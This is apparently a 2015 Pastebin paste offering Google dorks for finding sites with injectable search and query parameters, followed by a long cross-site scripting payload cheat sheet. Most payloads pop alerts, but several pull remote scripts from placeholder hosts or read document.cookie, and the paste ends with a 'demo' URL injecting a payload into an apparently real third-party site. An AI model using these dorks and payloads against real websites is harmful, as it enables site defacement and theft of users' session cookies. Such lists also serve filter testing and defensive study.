Advertisement
Versailles

XSS DORK AND CHEATSHEET

Aug 20th, 2015
553
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.66 KB | None | 0 0
  1. #--------------------#
  2. Xss Dorks
  3. #--------------------#
  4.  
  5. inurl:search.php?q=
  6. inurl:".php?txt="
  7. inurl:".php?tag="
  8. inurl:".php?max="
  9. inurl:".php?from="
  10. inurl:".php?author="
  11. inurl:".php?pass="
  12. inurl:".php?feedback="
  13. inurl:".php?cmd="
  14. inurl:".php?z="
  15. inurl:".php?q="
  16. inurl:".php?search="
  17. inurl:".php?query="
  18. inurl:".php?searchstring="
  19. inurl:".php?keyword="
  20. inurl:".php?file="
  21. inurl:".php?years="
  22. inurl:".php?mail="
  23. inurl:".php?cat="
  24. inurl:".php?vote="
  25. inurl:headersearch.php?sid=
  26. inurl:/poll/default.asp?catid=
  27. inurl:/search_results.php?search=
  28. #-------------------#
  29.  
  30.  
  31. #-------------------#
  32. Xss CheatSheet
  33. #-------------------#
  34. <script>alert('Xssed%20By%20Versailles');</script>
  35.  
  36. <script>alert(1);</script>
  37.  
  38. <IMG SRC="javascript:alert('XSS');">
  39.  
  40. <IMG SRC=javascript:alert('XSS')>
  41.  
  42. <IMG SRC=JaVaScRiPt:alert('XSS')>
  43.  
  44. '';!--"<XSS>=&{()}
  45.  
  46. '>//\\,<'>">">"*"
  47.  
  48. '); alert('XSS
  49.  
  50. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  51.  
  52. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  53.  
  54. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  55.  
  56. <script>alert(String.fromCharCode(88,83,83))</script>
  57.  
  58. <img src=foo.png onerror=alert(/xssed/) />
  59.  
  60. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  61.  
  62. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  63.  
  64. <marquee><script>alert('XSS')</script></marquee>
  65.  
  66. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  67.  
  68. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  69.  
  70. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  71.  
  72. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  73.  
  74. "><script>alert(0)</script>
  75.  
  76. <script src=http://yoursite.com/your_files.js></script>
  77.  
  78. </title><script>alert(/xss/)</script>
  79.  
  80. </textarea><script>alert(/xss/)</script>
  81.  
  82. <IMG LOWSRC=\"javascript:alert('XSS')\">
  83.  
  84. <IMG DYNSRC=\"javascript:alert('XSS')\">
  85.  
  86. <font style='color:expression(alert(document.cookie))'>
  87.  
  88. <img src="javascript:alert('XSS')">
  89.  
  90. <script language="JavaScript">alert('XSS')</script>
  91.  
  92. <body onunload="javascript:alert('XSS');">
  93.  
  94. <body onLoad="alert('XSS');"
  95.  
  96. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  97.  
  98. "/></a></><img src=1.gif onerror=alert(1)>
  99.  
  100. window.alert("Bonjour !");
  101.  
  102. <div style="x:expression((window.r==1)?'':eval('r=1;
  103.  
  104. alert(String.fromCharCode(88,83,83));'))">
  105.  
  106. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  107.  
  108. "><script alert(String.fromCharCode(88,83,83))</script>
  109.  
  110. '>><marquee><h1>XSS</h1></marquee>
  111.  
  112. '">><script>alert('XSS')</script>
  113.  
  114. '">><marquee><h1>XSS</h1></marquee>
  115.  
  116. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  117.  
  118. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  119.  
  120. <script>var var = 1; alert(var)</script>
  121.  
  122. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  123.  
  124. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  125.  
  126. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  127.  
  128. " onfocus=alert(document.domain) "> <"
  129.  
  130. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  131.  
  132. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  133.  
  134. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  135.  
  136. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  137.  
  138. <br size=\"&{alert('XSS')}\">
  139.  
  140. <scrscriptipt>alert(1)</scrscriptipt>
  141.  
  142. </br style=a:expression(alert())>
  143.  
  144. </script><script>alert(1)</script>
  145.  
  146. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  147.  
  148. [color=red width=expression(alert(123))][color]
  149.  
  150. <BASE HREF="javascript:alert('XSS');//">
  151.  
  152. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  153.  
  154. "></iframe><script>alert(123)</script>
  155.  
  156. <body onLoad="while(true) alert('XSS');">
  157.  
  158. '"></title><script>alert(1111)</script>
  159.  
  160. </textarea>'"><script>alert(document.cookie)</script>
  161.  
  162. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  163.  
  164. </script></script><<<<script><>>>><<<script>alert(123)</script>
  165.  
  166. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  167.  
  168. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  169.  
  170. '></select><script>alert(123)</script>
  171.  
  172. '>"><script src = 'http://www.site.com/XSS.js'></script>
  173.  
  174. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  175.  
  176. <SCRIPT>document.write("XSS");</SCRIPT>
  177.  
  178. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  179.  
  180. ='><script>alert("xss")</script>
  181.  
  182. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  183.  
  184. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  185.  
  186. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  187.  
  188. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  189.  
  190. src="http://www.site.com/XSS.js"></script>
  191.  
  192. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  193.  
  194. !--" /><script>alert('xss');</script>
  195.  
  196. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  197.  
  198. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  199.  
  200. '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  201.  
  202. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  203.  
  204. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  205.  
  206. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  207.  
  208. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  209.  
  210. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  211. #---------------------#
  212.  
  213. #---------------------#
  214. Demo :: http://weblagump3.info/soundmp3/index.php?search=<script>alert(%27Xssed%20By%20Versailles%27);</script>&type=mp3
  215.  
  216. Thanks Sudah Membaca :p
  217. Semoga Bermanfaat Bagi jones :p
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement